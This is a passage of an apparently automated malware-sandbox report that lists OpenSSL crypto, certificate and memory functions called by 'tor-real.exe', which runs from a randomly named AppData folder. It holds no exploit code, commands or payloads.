                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096DB8 CRYPTO_free,BIO_clear_flags,BIO_set_flags,memcpy,BIO_snprintf,ERR_add_error_data,__stack_chk_fail,25_2_6C096DB8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEDBB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_get0_DH,BN_bin2bn,DH_set0_key,EVP_PKEY_free,CRYPTO_clear_free,25_2_6C0DEDBB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DADC7 CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,25_2_6C0DADC7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0E10 EVP_PKEY_free,EVP_MD_CTX_free,BN_bin2bn,BN_bin2bn,BN_bin2bn,BN_bin2bn,CRYPTO_free,CRYPTO_strndup,__stack_chk_fail,25_2_6C0D0E10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094E20 CRYPTO_zalloc,ERR_put_error,25_2_6C094E20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4E24 CRYPTO_free,CRYPTO_free,memcmp,25_2_6C0A4E24
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BCE30 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,25_2_6C0BCE30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B6E60 strlen,CRYPTO_malloc,strcpy,CRYPTO_clear_free,25_2_6C0B6E60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AEE66 CRYPTO_realloc,CRYPTO_realloc,memset,25_2_6C0AEE66
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A0E80 CRYPTO_zalloc,25_2_6C0A0E80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D4EA7 CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,25_2_6C0D4EA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A0EE0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,25_2_6C0A0EE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEF43 CRYPTO_clear_free,EVP_PKEY_free,25_2_6C0DEF43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094F70 CRYPTO_free,25_2_6C094F70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DEF89 CRYPTO_clear_free,25_2_6C0DEF89
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4FA7 CRYPTO_malloc,25_2_6C0E4FA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D4FA6 CRYPTO_free,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,25_2_6C0D4FA6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09CFC4 EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,25_2_6C09CFC4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A800 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,25_2_6C09A800
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE844 CRYPTO_free,25_2_6C0BE844
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC860 memcmp,time,CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,25_2_6C0BC860
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C28A8 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,25_2_6C0C28A8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E48B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E48B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE8E5 CRYPTO_free,CRYPTO_strdup,CRYPTO_free,__stack_chk_fail,25_2_6C0BE8E5
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E28F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,25_2_6C0E28F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC919 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,25_2_6C0CC919
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C0949 OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,25_2_6C0C0949
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BA940 CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C0BA940
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A946 CRYPTO_free,CRYPTO_malloc,25_2_6C09A946
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09696C CRYPTO_free,CRYPTO_free,25_2_6C09696C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2960 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,25_2_6C0D2960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4974 CRYPTO_free,25_2_6C0E4974
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0969D0 CRYPTO_free,25_2_6C0969D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D89E0 CRYPTO_memcmp,memcpy,memcpy,__stack_chk_fail,25_2_6C0D89E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D49F0 __stack_chk_fail,__stack_chk_fail,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,25_2_6C0D49F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E49F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0E49F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2A0C CRYPTO_memcmp,25_2_6C0C2A0C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B6A2B CRYPTO_malloc,CRYPTO_free,ERR_put_error,25_2_6C0B6A2B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CEA50 OPENSSL_sk_new_null,X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,__stack_chk_fail,CRYPTO_free,25_2_6C0CEA50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2A73 ERR_put_error,CRYPTO_free,25_2_6C0B2A73
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C6A8B CRYPTO_free,CRYPTO_free,CRYPTO_memdup,25_2_6C0C6A8B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094A80 CRYPTO_zalloc,CRYPTO_free,ERR_put_error,BUF_MEM_grow,25_2_6C094A80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C4A86 CRYPTO_free,CRYPTO_memdup,25_2_6C0C4A86
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4AEC CRYPTO_malloc,CRYPTO_free,25_2_6C0E4AEC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACAE0 OPENSSL_init_crypto,CRYPTO_THREAD_run_once,ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,25_2_6C0ACAE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096B00 CRYPTO_free,25_2_6C096B00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4B18 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,25_2_6C0B4B18
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACB24 CRYPTO_THREAD_run_once,25_2_6C0ACB24
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BAB3C CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C0BAB3C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CEB59 X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,25_2_6C0CEB59
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09AB50 CRYPTO_free,25_2_6C09AB50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACBB4 CRYPTO_THREAD_run_once,25_2_6C0ACBB4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AEBEB CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,25_2_6C0AEBEB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0ACBE7 CRYPTO_THREAD_run_once,25_2_6C0ACBE7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA419 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,25_2_6C0AA419
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE421 CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0AE421
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2426 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0B2426
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096440 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C096440
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096453 CRYPTO_free,CRYPTO_free,25_2_6C096453
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2469 CRYPTO_free,25_2_6C0C2469
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0460 CRYPTO_clear_free,25_2_6C0D0460
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B247C CRYPTO_memdup,CRYPTO_free,25_2_6C0B247C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0964AC CRYPTO_free,CRYPTO_free,25_2_6C0964AC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0944C0 CRYPTO_free,25_2_6C0944C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE4D6 CRYPTO_free,25_2_6C0CE4D6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B24D7 CRYPTO_free,25_2_6C0B24D7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC500 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,25_2_6C0BC500
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096504 CRYPTO_free,CRYPTO_free,25_2_6C096504
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09453C CRYPTO_free,25_2_6C09453C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D0533 CRYPTO_clear_free,25_2_6C0D0533
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D455B CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D455B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC55B X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,25_2_6C0CC55B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC590 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,25_2_6C0AC590
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A5A0 CRYPTO_free,25_2_6C09A5A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0965A0 CRYPTO_free,25_2_6C0965A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D25A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D25A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A61C CRYPTO_malloc,malloc,25_2_6C09A61C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC640 CRYPTO_strdup,CRYPTO_free,strlen,CRYPTO_free,25_2_6C0AC640
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA647 CRYPTO_malloc,EVP_CIPHER_CTX_new,HMAC_CTX_new,EVP_CIPHER_CTX_iv_length,EVP_EncryptUpdate,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_MD_size,RAND_bytes,time,CRYPTO_free,CRYPTO_memdup,EVP_aes_256_cbc,EVP_CIPHER_iv_length,RAND_bytes,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,__stack_chk_fail,EVP_EncryptFinal,HMAC_Update,HMAC_Final,25_2_6C0DA647
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C0640 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,BIO_ctrl,EVP_DigestUpdate,__stack_chk_fail,25_2_6C0C0640
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C094670 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,BUF_MEM_grow,25_2_6C094670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE670 EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,memset,ERR_put_error,25_2_6C0AE670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A4670 ASN1_item_d2i,ERR_put_error,ASN1_item_free,ASN1_item_free,ERR_put_error,memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,ASN1_item_free,ERR_put_error,time,ERR_put_error,__stack_chk_fail,25_2_6C0A4670
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B2675 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new,OPENSSL_sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,RAND_priv_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,25_2_6C0B2675
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC690 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,25_2_6C0BC690
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC6A3 CRYPTO_free,25_2_6C0AC6A3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C26A3 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,CRYPTO_memcmp,OPENSSL_cleanse,__stack_chk_fail,memset,EVP_MD_size,__stack_chk_fail,time,EVP_MD_size,EVP_MD_size,__stack_chk_fail,25_2_6C0C26A3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE6B8 CRYPTO_free,25_2_6C0BE6B8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C46BB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_set1_tls_encodedpoint,EVP_PKEY_free,EVP_PKEY_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,CRYPTO_memdup,25_2_6C0C46BB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09A6B0 CRYPTO_free,CRYPTO_malloc,25_2_6C09A6B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC6B7 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,25_2_6C0BC6B7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0966E0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0966E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E26E0 CRYPTO_free,25_2_6C0E26E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C096713 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,25_2_6C096713
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE710 CRYPTO_free,25_2_6C0BE710
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D2747 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0D2747
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE760 CRYPTO_free,CRYPTO_free,25_2_6C0BE760
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC7A1 CRYPTO_THREAD_unlock,25_2_6C0BC7A1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE7B1 CRYPTO_free,25_2_6C0BE7B1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC7D9 CRYPTO_THREAD_unlock,25_2_6C0BC7D9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A47E1 memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,25_2_6C0A47E1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D87E0 CRYPTO_malloc,memcpy,25_2_6C0D87E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BE7F7 CRYPTO_free,25_2_6C0BE7F7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA006 CRYPTO_malloc,ERR_put_error,25_2_6C0AA006
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC000 __stack_chk_fail,X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_get0_DH,DH_get0_key,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_clear_free,EVP_PKEY_CTX_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,25_2_6C0CC000
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DE01B CRYPTO_memdup,25_2_6C0DE01B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AC050 CRYPTO_zalloc,25_2_6C0AC050
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DE0C7 CRYPTO_free,CRYPTO_memdup,25_2_6C0DE0C7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0EA0C0 SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,25_2_6C0EA0C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE0F2 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,25_2_6C0AE0F2
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BC0F0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,OPENSSL_LH_retrieve,25_2_6C0BC0F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B4120 OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_new_reserve,OPENSSL_sk_value,EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,ERR_put_error,ERR_put_error,ERR_put_error,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,25_2_6C0B4120
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE138 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,25_2_6C0AE138
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AE180 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,__stack_chk_fail,X509_VERIFY_PARAM_set_purpose,25_2_6C0AE180
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE1A8 CRYPTO_free,25_2_6C0CE1A8
